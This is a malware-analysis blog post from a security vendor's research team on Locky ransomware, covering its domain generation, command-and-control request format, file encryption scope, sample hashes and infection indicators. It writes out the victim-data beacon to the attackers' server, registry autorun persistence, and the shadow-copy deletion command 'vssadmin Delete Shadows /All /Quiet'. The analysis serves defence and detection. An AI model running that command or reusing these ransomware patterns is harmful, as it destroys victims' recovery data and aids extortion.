FortiGuard Labs Threat Research

A Closer Look at Locky Ransomware

By Floser Bacurio, Rommel Joven and Roland Dela Paz | February 17, 2016

A new ransomware named “Locky” is currently circulating in the wild and making the headlines. There are some good reports regarding Locky ransomware already available over the Internet. This blog intends to focus on some technical areas that (we believe) have not been covered yet, namely, its domain generation algorithm, command and control communication, and file encryption.

For reference, the following is a screenshot of Locky’s Decrypter page (cropped to save space):

Based on Harry71’s Onion Spider, the Locky decryptor page became available on February 6, 2016 which may indicate the start of Locky’s operation:

Domain Generation Algorithm

Before proceeding with its DGA, Locky ransomware calls RDTSC function to get a timestamp counter. It then implements modulo computation based on the RDTSC result. If the result is less than six, it will trigger DGA. Otherwise, it will directly connect to a hardcoded IP address:

The following shows the DGA algorithm of the malware. The domains are generated based on the affected machine’s year, month, day as well as some hardcoded seed values:

C&C communication

The initial phone home to the C&C is in the following format:

HTTP POST http://{malware C&C}/main.php

id={randomly generated victim ID}&act={ command sent to the C&C}&affid={affiliate ID}&lang={computer language}&corp=0&serv=0&os={operating system}&sp={service pack}&x64={if 64 bit}

All outbound requests of the malware to its C&C server are encrypted using the following algorithm with specific hardcoded keys (highlighted):

Similarly, all inbound data (C&C replies) are decrypted by the malware with specific algorithm and keys:


The C&C currently accepts the following requests from the malware under the “&act=” parameter:

The following are sample malware-C&C communication before encryption.



The following is a sample decrypted response from the C&C containing the public RSA key:


 It can be seen above that the delimiter for each affected file name is backslash (0x5c).


The ransomware is capable of serving ransomware notes in different languages. Upon spoofing the “&lang” parameter with “fr”, for instance, we received the following response which is now in French language:

File Encryption

Finally as a supplement to what is already reported on the Internet, it encrypts files located at fixed, removable and RAM disk drive types:


Based on our findings above, we believe that the actors behind Locky are experienced cybercriminals. The way the ransomware is designed resembles prominent ransomware families as demonstrated by its DGA capabilities and elaborate C&C reporting.

We also predict that Locky ransomware will be a major player in the ransomware scene. Fortinet will continue to monitor developments regarding this malware.

UPDATE: 18/2/2016

Fortinet blocks Locky C&C communication via the IPS signature Locky.Botnet.

-= FortiGuard Lion Team =-


e1a9b6f7285a85e682ebcad028472d13 W32/Kryptik.EOEN!tr
003d8a858d00ac436641dd0210eb074f  W32/Filecoder.NFX!tr
31d2bdcd2fc117b558b54e731af02a65 W32/Reconyc.FETU!tr
e22f77892cb4ed72e58c84bc18e33c69 W32/Reconyc.FETU!tr
b9ffd5c5f63b9438a26f36a19bd78e93 W32/Reconyc.FETU!tr
fb6ca1cd232151d667f6cd2484fee8c8 W32/Reconyc.FETU!tr


Dropped copy:

Added files:
 %User Profile%\Desktop\_Locky_recover_instructions.bmp
{encrypted filepath}\_Locky_recover_instructions.txt

Added registry:

key: HKCU\Software\Locky
value: id
data: {victim ID}
value: pubkey
data: {public key}
value: paytext
data: {ransom note in HEX}

key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
value: Locky
data: %Temp%\svchost.exe

key: HKCU\Control Panel\Desktop
value: Wallpaper
data: %User Profile%\Desktop\_Locky_recover_instructions.bmp

Cmd command:
vssadmin.exe Delete Shadows /All /Quiet